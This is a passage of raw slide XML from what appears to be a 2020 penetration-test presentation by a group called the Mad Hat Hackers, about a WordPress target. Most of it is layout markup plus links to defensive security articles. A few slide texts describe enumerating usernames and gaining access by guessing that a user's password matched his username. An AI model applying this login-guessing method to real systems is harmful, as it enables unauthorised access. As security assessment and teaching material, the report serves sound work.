            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1830" l="0" r="0" t="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8219361"/>
            <a:ext cx="2094299" cy="1618400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184992" y="38804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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119808" y="6108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2" name="Google Shape;1332;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="83558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3" name="Google Shape;1333;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="119609" y="10603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792">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="14564">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="7920">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334" name="Shape 1334"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1335" name="Google Shape;1335;p85"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2498" l="0" r="0" t="2489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="24377650" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1336" name="Google Shape;1336;p85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731375" y="1734175"/>
            <a:ext cx="22915500" cy="11376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8" name="Google Shape;1338;p8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9" name="Google Shape;1339;p8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40" name="Google Shape;1340;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="475" y="3424675"/>
            <a:ext cx="24377700" cy="94590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43" name="Shape 1343"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1344" name="Google Shape;1344;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5" name="Google Shape;1345;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6" name="Google Shape;1346;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47" name="Google Shape;1347;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48" name="Google Shape;1348;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9" name="Google Shape;1349;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0" name="Google Shape;1350;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52" name="Google Shape;1352;p87"/>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53" name="Shape 1353"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1354" name="Google Shape;1354;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5" name="Google Shape;1355;p8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56" name="Google Shape;1356;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57" name="Google Shape;1357;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58" name="Google Shape;1358;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9" name="Google Shape;1359;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0" name="Google Shape;1360;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61" name="Google Shape;1361;p88"/>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62" name="Google Shape;1362;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63" name="Shape 1363"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1364" name="Google Shape;1364;p8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65" name="Google Shape;1365;p8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66" name="Google Shape;1366;p8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67" name="Google Shape;1367;p8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68" name="Google Shape;1368;p8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9" name="Google Shape;1369;p8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0" name="Google Shape;1370;p8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71" name="Google Shape;1371;p89"/>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72" name="Google Shape;1372;p8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73" name="Shape 1373"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1374" name="Google Shape;1374;p9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75" name="Google Shape;1375;p9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76" name="Google Shape;1376;p9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77" name="Google Shape;1377;p90"/>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78" name="Google Shape;1378;p9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79" name="Google Shape;1379;p9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0" name="Google Shape;1380;p9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1" name="Google Shape;1381;p9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82" name="Google Shape;1382;p9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83" name="Shape 1383"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1384" name="Google Shape;1384;p9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86" name="Google Shape;1386;p91"/>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87" name="Google Shape;1387;p91"/>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89" name="Shape 1389"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1390" name="Google Shape;1390;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91" name="Google Shape;1391;p9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92" name="Google Shape;1392;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3" name="Google Shape;1393;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94" name="Shape 1394"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p9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6" name="Google Shape;1396;p9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97" name="Google Shape;1397;p9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98" name="Google Shape;1398;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99" name="Google Shape;1399;p9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00" name="Google Shape;1400;p9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1" name="Google Shape;1401;p93"/>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402" name="Shape 1402"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1403" name="Google Shape;1403;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="24443096" cy="13715999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731375" y="1734175"/>
            <a:ext cx="22915500" cy="11376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5" name="Google Shape;1405;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="119" l="0" r="0" t="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18286230" y="2427400"/>
            <a:ext cx="4875530" cy="10092796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1406" name="Google Shape;1406;p9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7" name="Google Shape;1407;p9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08" name="Google Shape;1408;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18305825"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9" name="Google Shape;1409;p9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0" name="Google Shape;141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411" name="Shape 1411"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1412" name="Google Shape;1412;p9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413" name="Google Shape;1413;p9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14" name="Google Shape;1414;p9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415" name="Google Shape;1415;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16" name="Google Shape;1416;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417" name="Shape 1417"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1418" name="Google Shape;1418;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19" name="Google Shape;1419;p9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420" name="Google Shape;1420;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21" name="Google Shape;142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2" name="Google Shape;1422;p9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23" name="Google Shape;1423;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4" name="Google Shape;1424;p9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25" name="Google Shape;1425;p9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26" name="Shape 1426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1427" name="Google Shape;1427;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8" name="Google Shape;1428;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9" name="Google Shape;1429;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0" name="Google Shape;1430;p9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32" name="Google Shape;1432;p9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33" name="Google Shape;143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34" name="Google Shape;1434;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35" name="Google Shape;1435;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6" name="Google Shape;1436;p9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37" name="Shape 1437"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1438" name="Google Shape;1438;p9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39" name="Google Shape;1439;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0" name="Google Shape;1440;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41" name="Google Shape;1441;p9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2" name="Google Shape;1442;p9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3" name="Google Shape;1443;p9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44" name="Google Shape;1444;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9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6" name="Google Shape;1446;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47" name="Shape 1447"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1448" name="Google Shape;1448;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9" name="Google Shape;1449;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0" name="Google Shape;1450;p9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51" name="Google Shape;1451;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52" name="Google Shape;1452;p9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3" name="Google Shape;1453;p9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4" name="Google Shape;1454;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55" name="Google Shape;1455;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56" name="Google Shape;1456;p9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57" name="Shape 1457"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1458" name="Google Shape;1458;p10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0" name="Google Shape;1460;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1" name="Google Shape;1461;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62" name="Google Shape;1462;p10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66" name="Google Shape;1466;p10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67" name="Shape 1467"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p10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69" name="Google Shape;1469;p10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70" name="Google Shape;1470;p10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71" name="Google Shape;1471;p10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72" name="Google Shape;1472;p10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73" name="Google Shape;1473;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4" name="Google Shape;1474;p10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5" name="Google Shape;1475;p10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76" name="Google Shape;1476;p10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7" name="Google Shape;1477;p10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78" name="Shape 1478"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1479" name="Google Shape;1479;p10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80" name="Google Shape;1480;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81" name="Google Shape;1481;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82" name="Google Shape;1482;p10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83" name="Google Shape;1483;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4" name="Google Shape;1484;p10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85" name="Google Shape;1485;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86" name="Google Shape;1486;p10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7" name="Google Shape;1487;p10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88" name="Shape 1488"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1489" name="Google Shape;1489;p10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0" name="Google Shape;1490;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1" name="Google Shape;1491;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2" name="Google Shape;1492;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3" name="Google Shape;1493;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4" name="Google Shape;1494;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5" name="Google Shape;1495;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6" name="Google Shape;1496;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="3676879"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1497" name="Google Shape;1497;p10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8" name="Google Shape;1498;p10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9" name="Google Shape;1499;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="5943313"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1500" name="Google Shape;1500;p10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1" name="Google Shape;1501;p10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2" name="Google Shape;1502;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="8196979"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1503" name="Google Shape;1503;p10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4" name="Google Shape;1504;p10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5" name="Google Shape;1505;p103"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218894" y="10463379"/>
            <a:ext cx="2071187" cy="1656821"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1506" name="Google Shape;1506;p10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7" name="Google Shape;1507;p10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8" name="Google Shape;1508;p10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9" name="Google Shape;1509;p10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2" name="Google Shape;1512;p10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4" name="Google Shape;1514;p10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25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme3.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2.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout124.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout123.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout126.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout125.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout128.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout127.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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout130.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout129.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13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33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout115.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout114.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout117.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout116.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51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout133.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout132.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout13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4" name="Shape 10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1" name="Shape 1341"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1342" name="Google Shape;1342;p86"/>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3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image239.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image236.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image235.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image233.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image237.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24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2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2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image244.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image250.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pagely.com/blog/hiding-wordpress-login-page/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wpwhitesecurity.com/enumerate-wordpress-users-wpscan-security-scann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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image252.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dzone.com/articles/determining-file-types-java%5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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image253.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hacksplaining.com/prevention/command-execution" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.smashingmagazine.com/2011/01/keeping-web-users-safe-by-sanitizing-input-dat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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/disable-directory-listing-web-servers/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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254.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image255.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image260.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image273.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image258.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image267.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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9.png"/><Relationship Id="rId4"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39"/>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br>
              <a:rPr lang="en-US" sz="6800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Detailed by the Mad Hat Hackers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>December 15, 2020</a:t>
            </a:r>
            <a:endParaRPr sz="5400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2354" name="Google Shape;2354;p1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Security Policy </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2428" name="Google Shape;2428;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9" name="Google Shape;2429;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Tools and Processes</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By having the usernames, michael was chosen and a few common password choices were used. The second attempt proved to be successful, it was his username, michael.</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This provided access into </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the target system</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2430" name="Google Shape;2430;p148"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10132250" y="5548675"/>
            <a:ext cx="13054400" cy="713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Dated version of Wordpress</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
